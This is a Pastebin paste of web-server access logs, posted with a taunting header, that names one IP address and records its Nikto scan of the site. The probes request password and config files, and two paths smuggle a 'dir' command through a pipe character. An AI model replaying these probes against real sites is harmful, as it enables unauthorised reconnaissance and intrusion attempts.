Advertisement
scriptz-team

HACKER iDiOTS #99 - YOU WANT IT? YOU GOT IT! - 84.56.69.222

Oct 24th, 2013
311
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 274.41 KB | None | 0 0
  1. /*
  2. THiS iS THE iPs and paths that HACKERz N00Bz TRiED to hack us (expose paths, passwd, error logs etc).
  3. DO NEVER TRY HACK US AGAiN!
  4. EVEN YOU DO MORE AND MORE, WE (NOT ONLY WE AS YOUR iP iS LOGGED BY NOW!) WiLL REPORT YOUR iP!
  5. */
  6.  
  7. Using some crap soft to get vulnerablity on our site? Rly? Cmon idiot!
  8.  
  9. ---------------------------
  10. 84.56.69.222 - - [23/Oct/2013:14:25:18 +0400] "GET / HTTP/1.1" 200 48078 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36"
  11. 84.56.69.222 - - [23/Oct/2013:14:25:18 +0400] "GET /img/flags/es.png HTTP/1.1" 200 469 "http://rlzlog.info/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36"
  12. 84.56.69.222 - - [23/Oct/2013:14:25:42 +0400] "GET /?t=Rehenes.S01E04.SPANiSH.HDTV.x264-FCC&date=2013-10-23%2012:21:52&cat=TV-x264&size=214.0MB|15F&key=f910e4464767b5e01fdc0fa547d753e6 HTTP/1.1" 200 6308 "http://rlzlog.info/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36"
  13. 84.56.69.222 - - [23/Oct/2013:14:25:42 +0400] "GET /render_nfo/img.php?t=Rehenes.S01E04.SPANiSH.HDTV.x264-FCC&x=b8176c5ae9394ac365a55e5cd24a3c05 HTTP/1.1" 200 9162 "http://rlzlog.info/?t=Rehenes.S01E04.SPANiSH.HDTV.x264-FCC&date=2013-10-23%2012:21:52&cat=TV-x264&size=214.0MB|15F&key=f910e4464767b5e01fdc0fa547d753e6" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36"
  14. 84.56.69.222 - - [23/Oct/2013:15:17:54 +0400] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:Port Check)"
  15. 84.56.69.222 - - [23/Oct/2013:15:17:54 +0400] "GET / HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:getinfo)"
  16. 84.56.69.222 - - [23/Oct/2013:15:17:54 +0400] "GET / HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  17. 84.56.69.222 - - [23/Oct/2013:15:17:55 +0400] "GET /IWnWs8Cl.htm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  18. 84.56.69.222 - - [23/Oct/2013:15:17:55 +0400] "GET /IWnWs8Cl.showsource HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  19. 84.56.69.222 - - [23/Oct/2013:15:17:55 +0400] "GET /IWnWs8Cl.snp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  20. 84.56.69.222 - - [23/Oct/2013:15:17:55 +0400] "GET /IWnWs8Cl.CGI HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  21. 84.56.69.222 - - [23/Oct/2013:15:17:56 +0400] "GET /IWnWs8Cl.xml+ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  22. 84.56.69.222 - - [23/Oct/2013:15:17:56 +0400] "GET /IWnWs8Cl.class HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  23. 84.56.69.222 - - [23/Oct/2013:15:17:56 +0400] "GET /IWnWs8Cl.backup HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  24. 84.56.69.222 - - [23/Oct/2013:15:17:57 +0400] "GET /IWnWs8Cl.xls HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  25. 84.56.69.222 - - [23/Oct/2013:15:18:07 +0400] "GET /IWnWs8Cl.asa HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  26. 84.56.69.222 - - [23/Oct/2013:15:18:07 +0400] "GET /IWnWs8Cl.tml HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  27. 84.56.69.222 - - [23/Oct/2013:15:18:07 +0400] "GET /IWnWs8Cl.lst HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  28. 84.56.69.222 - - [23/Oct/2013:15:18:08 +0400] "GET /IWnWs8Cl.el HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  29. 84.56.69.222 - - [23/Oct/2013:15:18:08 +0400] "GET /IWnWs8Cl.iso8859-8 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  30. 84.56.69.222 - - [23/Oct/2013:15:18:08 +0400] "GET /IWnWs8Cl.INC HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  31. 84.56.69.222 - - [23/Oct/2013:15:18:08 +0400] "GET /IWnWs8Cl.phpp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  32. 84.56.69.222 - - [23/Oct/2013:15:18:09 +0400] "GET /IWnWs8Cl.ee HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  33. 84.56.69.222 - - [23/Oct/2013:15:18:09 +0400] "GET /IWnWs8Cl.cellsprint HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  34. 84.56.69.222 - - [23/Oct/2013:15:18:09 +0400] "GET /IWnWs8Cl.ida HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  35. 84.56.69.222 - - [23/Oct/2013:15:18:09 +0400] "GET /IWnWs8Cl.asp+ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  36. 84.56.69.222 - - [23/Oct/2013:15:18:09 +0400] "GET /IWnWs8Cl.LOG HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  37. 84.56.69.222 - - [23/Oct/2013:15:18:10 +0400] "GET /IWnWs8Cl.xsql HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  38. 84.56.69.222 - - [23/Oct/2013:15:18:10 +0400] "GET /IWnWs8Cl.VALIDATE_STMT HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  39. 84.56.69.222 - - [23/Oct/2013:15:18:10 +0400] "GET /IWnWs8Cl.cfm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  40. 84.56.69.222 - - [23/Oct/2013:15:18:10 +0400] "GET /IWnWs8Cl.box HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  41. 84.56.69.222 - - [23/Oct/2013:15:18:11 +0400] "GET /IWnWs8Cl.SMAIL893 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  42. 84.56.69.222 - - [23/Oct/2013:15:18:11 +0400] "GET /IWnWs8Cl.net HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  43. 84.56.69.222 - - [23/Oct/2013:15:18:12 +0400] "GET /IWnWs8Cl.utf8 HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  44. 84.56.69.222 - - [23/Oct/2013:15:18:12 +0400] "GET /IWnWs8Cl.2 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  45. 84.56.69.222 - - [23/Oct/2013:15:18:23 +0400] "GET /IWnWs8Cl.php3 HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  46. 84.56.69.222 - - [23/Oct/2013:15:18:23 +0400] "GET /IWnWs8Cl.10:100 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  47. 84.56.69.222 - - [23/Oct/2013:15:18:24 +0400] "GET /IWnWs8Cl.org HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  48. 84.56.69.222 - - [23/Oct/2013:15:18:34 +0400] "GET /IWnWs8Cl.nn HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  49. 84.56.69.222 - - [23/Oct/2013:15:18:34 +0400] "GET /IWnWs8Cl.www_acl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  50. 84.56.69.222 - - [23/Oct/2013:15:18:34 +0400] "GET /IWnWs8Cl.LCDispatcher HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  51. 84.56.69.222 - - [23/Oct/2013:15:18:35 +0400] "GET /IWnWs8Cl.PRINT HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  52. 84.56.69.222 - - [23/Oct/2013:15:18:35 +0400] "GET /IWnWs8Cl.save HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  53. 84.56.69.222 - - [23/Oct/2013:15:18:35 +0400] "GET /IWnWs8Cl.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  54. 84.56.69.222 - - [23/Oct/2013:15:18:36 +0400] "GET /IWnWs8Cl.koi8-r HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  55. 84.56.69.222 - - [23/Oct/2013:15:18:36 +0400] "GET /IWnWs8Cl.types HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  56. 84.56.69.222 - - [23/Oct/2013:15:18:36 +0400] "GET /IWnWs8Cl.js0x70 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  57. 84.56.69.222 - - [23/Oct/2013:15:18:36 +0400] "GET /IWnWs8Cl.dat HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  58. 84.56.69.222 - - [23/Oct/2013:15:18:36 +0400] "GET /IWnWs8Cl.apw HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  59. 84.56.69.222 - - [23/Oct/2013:15:18:36 +0400] "GET /IWnWs8Cl.csp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  60. 84.56.69.222 - - [23/Oct/2013:15:18:37 +0400] "GET /IWnWs8Cl.pm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  61. 84.56.69.222 - - [23/Oct/2013:15:18:37 +0400] "GET /IWnWs8Cl.iso-ru HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  62. 84.56.69.222 - - [23/Oct/2013:15:18:38 +0400] "GET /IWnWs8Cl.passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  63. 84.56.69.222 - - [23/Oct/2013:15:18:38 +0400] "GET /IWnWs8Cl.xml HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  64. 84.56.69.222 - - [23/Oct/2013:15:18:38 +0400] "GET /IWnWs8Cl.pw HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  65. 84.56.69.222 - - [23/Oct/2013:15:18:39 +0400] "GET /IWnWs8Cl.se HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  66. 84.56.69.222 - - [23/Oct/2013:15:18:39 +0400] "GET /IWnWs8Cl.log HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  67. 84.56.69.222 - - [23/Oct/2013:15:18:39 +0400] "GET /IWnWs8Cl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  68. 84.56.69.222 - - [23/Oct/2013:15:18:39 +0400] "GET /IWnWs8Cl.es HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  69. 84.56.69.222 - - [23/Oct/2013:15:18:39 +0400] "GET /IWnWs8Cl.genpopuplist HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  70. 84.56.69.222 - - [23/Oct/2013:15:18:39 +0400] "GET /IWnWs8Cl.axd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  71. 84.56.69.222 - - [23/Oct/2013:15:18:40 +0400] "GET /IWnWs8Cl.idq HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  72. 84.56.69.222 - - [23/Oct/2013:15:18:40 +0400] "GET /IWnWs8Cl.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  73. 84.56.69.222 - - [23/Oct/2013:15:18:40 +0400] "GET /IWnWs8Cl.adjunct HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  74. 84.56.69.222 - - [23/Oct/2013:15:18:40 +0400] "GET /IWnWs8Cl.inc HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  75. 84.56.69.222 - - [23/Oct/2013:15:18:40 +0400] "GET /IWnWs8Cl.mdb HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  76. 84.56.69.222 - - [23/Oct/2013:15:18:41 +0400] "GET /IWnWs8Cl.shtml HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  77. 84.56.69.222 - - [23/Oct/2013:15:18:41 +0400] "GET /IWnWs8Cl.AP HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  78. 84.56.69.222 - - [23/Oct/2013:15:18:41 +0400] "GET /IWnWs8Cl.pl|dir HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  79. 84.56.69.222 - - [23/Oct/2013:15:18:41 +0400] "GET /IWnWs8Cl.ca HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  80. 84.56.69.222 - - [23/Oct/2013:15:18:42 +0400] "GET /IWnWs8Cl.TPF HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  81. 84.56.69.222 - - [23/Oct/2013:15:18:42 +0400] "GET /IWnWs8Cl.orig HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  82. 84.56.69.222 - - [23/Oct/2013:15:18:43 +0400] "GET /IWnWs8Cl.render_warning_screen HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  83. 84.56.69.222 - - [23/Oct/2013:15:18:50 +0400] "GET /IWnWs8Cl.cgi+ HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  84. 84.56.69.222 - - [23/Oct/2013:15:18:51 +0400] "GET /IWnWs8Cl.no HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  85. 84.56.69.222 - - [23/Oct/2013:15:18:51 +0400] "GET /IWnWs8Cl.iso2022-kr HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  86. 84.56.69.222 - - [23/Oct/2013:15:18:51 +0400] "GET /IWnWs8Cl.home HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  87. 84.56.69.222 - - [23/Oct/2013:15:19:02 +0400] "GET /IWnWs8Cl.notes HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  88. 84.56.69.222 - - [23/Oct/2013:15:19:02 +0400] "GET /IWnWs8Cl.prf HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  89. 84.56.69.222 - - [23/Oct/2013:15:19:03 +0400] "GET /IWnWs8Cl.db HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  90. 84.56.69.222 - - [23/Oct/2013:15:19:03 +0400] "GET /IWnWs8Cl.rdf+destype=cache+desformat=PDF HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  91. 84.56.69.222 - - [23/Oct/2013:15:19:03 +0400] "GET /IWnWs8Cl.eml HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  92. 84.56.69.222 - - [23/Oct/2013:15:19:03 +0400] "GET /IWnWs8Cl.cp866 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  93. 84.56.69.222 - - [23/Oct/2013:15:19:04 +0400] "GET /IWnWs8Cl.var HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  94. 84.56.69.222 - - [23/Oct/2013:15:19:04 +0400] "GET /IWnWs8Cl.php= HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  95. 84.56.69.222 - - [23/Oct/2013:15:19:04 +0400] "GET /IWnWs8Cl.map HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  96. 84.56.69.222 - - [23/Oct/2013:15:19:05 +0400] "GET /IWnWs8Cl.zip HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  97. 84.56.69.222 - - [23/Oct/2013:15:19:05 +0400] "GET /IWnWs8Cl.Big5 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  98. 84.56.69.222 - - [23/Oct/2013:15:19:05 +0400] "GET /IWnWs8Cl.html+ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  99. 84.56.69.222 - - [23/Oct/2013:15:19:05 +0400] "GET /IWnWs8Cl.dbc HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  100. 84.56.69.222 - - [23/Oct/2013:15:19:05 +0400] "GET /IWnWs8Cl.cmd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  101. 84.56.69.222 - - [23/Oct/2013:15:19:05 +0400] "GET /IWnWs8Cl.nl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  102. 84.56.69.222 - - [23/Oct/2013:15:19:05 +0400] "GET /IWnWs8Cl.php+ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  103. 84.56.69.222 - - [23/Oct/2013:15:19:06 +0400] "GET /IWnWs8Cl.bat|dir HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  104. 84.56.69.222 - - [23/Oct/2013:15:19:06 +0400] "GET /IWnWs8Cl.bas HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  105. 84.56.69.222 - - [23/Oct/2013:15:19:06 +0400] "GET /IWnWs8Cl.cfc HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  106. 84.56.69.222 - - [23/Oct/2013:15:19:06 +0400] "GET /IWnWs8Cl.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  107. 84.56.69.222 - - [23/Oct/2013:15:19:06 +0400] "GET /IWnWs8Cl.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  108. 84.56.69.222 - - [23/Oct/2013:15:19:06 +0400] "GET /IWnWs8Cl.stm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  109. 84.56.69.222 - - [23/Oct/2013:15:19:07 +0400] "GET /IWnWs8Cl.blt HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  110. 84.56.69.222 - - [23/Oct/2013:15:19:07 +0400] "GET /IWnWs8Cl.sqlite HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  111. 84.56.69.222 - - [23/Oct/2013:15:19:07 +0400] "GET /IWnWs8Cl.SSIFilter HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  112. 84.56.69.222 - - [23/Oct/2013:15:19:07 +0400] "GET /IWnWs8Cl.en HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  113. 84.56.69.222 - - [23/Oct/2013:15:19:07 +0400] "GET /IWnWs8Cl.vts HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  114. 84.56.69.222 - - [23/Oct/2013:15:19:07 +0400] "GET /IWnWs8Cl. HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  115. 84.56.69.222 - - [23/Oct/2013:15:19:08 +0400] "GET /IWnWs8Cl.listprint HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  116. 84.56.69.222 - - [23/Oct/2013:15:19:08 +0400] "GET /IWnWs8Cl.htr HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  117. 84.56.69.222 - - [23/Oct/2013:15:19:18 +0400] "GET /IWnWs8Cl.cwr HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  118. 84.56.69.222 - - [23/Oct/2013:15:19:18 +0400] "GET /IWnWs8Cl.list HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  119. 84.56.69.222 - - [23/Oct/2013:15:19:19 +0400] "GET /IWnWs8Cl.php4 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  120. 84.56.69.222 - - [23/Oct/2013:15:19:19 +0400] "GET /IWnWs8Cl.ml HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  121. 84.56.69.222 - - [23/Oct/2013:15:19:19 +0400] "GET /IWnWs8Cl.ASP HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  122. 84.56.69.222 - - [23/Oct/2013:15:19:19 +0400] "GET /IWnWs8Cl.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  123. 84.56.69.222 - - [23/Oct/2013:15:19:20 +0400] "GET /IWnWs8Cl.gz HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  124. 84.56.69.222 - - [23/Oct/2013:15:19:20 +0400] "GET /IWnWs8Cl.password HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  125. 84.56.69.222 - - [23/Oct/2013:15:19:21 +0400] "GET /IWnWs8Cl.show_query_columns HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  126. 84.56.69.222 - - [23/Oct/2013:15:19:21 +0400] "GET /IWnWs8Cl.jsa HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  127. 84.56.69.222 - - [23/Oct/2013:15:19:22 +0400] "GET /IWnWs8Cl.back HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  128. 84.56.69.222 - - [23/Oct/2013:15:19:23 +0400] "GET /IWnWs8Cl.sh HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  129. 84.56.69.222 - - [23/Oct/2013:15:19:23 +0400] "GET /IWnWs8Cl.dpgs HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  130. 84.56.69.222 - - [23/Oct/2013:15:19:23 +0400] "GET /IWnWs8Cl.printer HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  131. 84.56.69.222 - - [23/Oct/2013:15:19:24 +0400] "GET /IWnWs8Cl.bin HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  132. 84.56.69.222 - - [23/Oct/2013:15:19:24 +0400] "GET /IWnWs8Cl.cs HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  133. 84.56.69.222 - - [23/Oct/2013:15:19:24 +0400] "GET /IWnWs8Cl.php3+ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  134. 84.56.69.222 - - [23/Oct/2013:15:19:25 +0400] "GET /IWnWs8Cl.shtm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  135. 84.56.69.222 - - [23/Oct/2013:15:19:25 +0400] "GET /IWnWs8Cl.PWD HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  136. 84.56.69.222 - - [23/Oct/2013:15:19:35 +0400] "GET /IWnWs8Cl.shm HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  137. 84.56.69.222 - - [23/Oct/2013:15:19:36 +0400] "GET /IWnWs8Cl.conf HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  138. 84.56.69.222 - - [23/Oct/2013:15:19:57 +0400] "GET /IWnWs8Cl.gif HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  139. 84.56.69.222 - - [23/Oct/2013:15:19:58 +0400] "GET /IWnWs8Cl.dbm HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
